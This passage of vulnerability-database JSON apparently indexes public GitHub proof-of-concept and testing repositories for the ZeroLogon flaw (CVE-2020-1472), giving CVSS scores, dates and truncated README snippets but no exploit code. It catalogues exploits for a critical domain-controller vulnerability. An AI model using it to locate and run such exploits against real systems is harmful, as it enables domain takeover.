Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-04-22T19:03:41", "id": "D7AB3F4A-8E41-5E5B-B987-99AFB571FE9C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:21:38", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T16:56:51", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-17T21:35:55", "id": "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-01T15:13:08", "description": "![Python][python-shield]\n\n# CVE-2020-1472\n\nCVE-2020-1472 - Zero ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T07:25:22", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-04-30T23:21:59", "id": "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:06", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-16T17:24:25", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-16T17:38:51", "id": "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:09:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:57:04", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-25T06:08:29", "id": "5B025A0D-055E-552C-B1FB-287C6F191F8E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T21:36:46", "description": "# Zerologon (CVE-2020-1472)\nThis script is made for bulk checkin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T18:45:44", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-15T19:52:37", "id": "49EC151F-12F0-59CF-960C-25BD54F46680", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:32", "description": "# ZeroLogon testing script\r\n\r\nA Python script that uses the Impa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T14:25:54", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:06", "id": "63C36F7A-5F99-5A79-B99F-260360AC237F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:17:29", "description": "# zabbix-template-CVE-2020-1472\nZabbix Template to monitor...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T02:37:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-08T22:22:05", "id": "12E44744-1AF0-523A-ACA2-593B4D33E014", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:15", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:54:09", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-10T11:45:35", "id": "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:49", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:54:27", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:42", "id": "FC661572-B96B-5B2C-B12F-E8D279E189BF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:01", "description": "# CVE-2020-1472\nCVE 2020-1472 Script de validaci\u00f3n \n\nAssumption:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-24T20:05:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T20:08:43", "id": "879CF3A7-ECBC-552A-A044-5E2724F63279", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:46:09", "description": "NOTICE: I have yet to build out this repo and it's respective sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-10T22:29:56", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-04T21:08:46", "id": "939F3BE7-AF69-5351-BD56-12412FA184C5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:15:27", "description": "# CVE-2020-1472\nChecker & Exploit Code for CVE-2020-1472 aka **Z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T16:57:49", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-08T04:14:32", "id": "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:28", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T07:45:50", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-30T07:57:36", "id": "28D42B84-AB24-5FC6-ADE1-610374D67F21", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:02", "description": "# Windows NetLogon \u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u590d\u73b0\uff08CVE-2020-1472\uff09\n\n\u9700\u5c06impacket.z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-26T08:31:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-01T09:13:51", "id": "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:32:45", "description": "# CVE-2020-1472-Easy\nThis is definitely not something you would ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T20:44:40", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T21:27:41", "id": "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:54", "description": "# Set-ZerologonMitigation\nProtect your domain controllers agains...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T16:10:26", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-13T15:41:20", "id": "7078ED42-959E-5242-BE9D-17F2F99C76A8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:37", "description": "# CVE-2020-1472 - Zero-Logon POC\n\n![alt text](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T14:29:24", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-27T07:28:51", "id": "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T06:53:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-28T06:53:54", "id": "F085F702-F1C3-5ACB-99BE-086DA182D98B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-14T13:34:35", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-08T08:58:37", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-14T07:26:46", "id": "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:36", "description": "<b>[CVE-2020-1472] Netlogon Remote Protocol Call 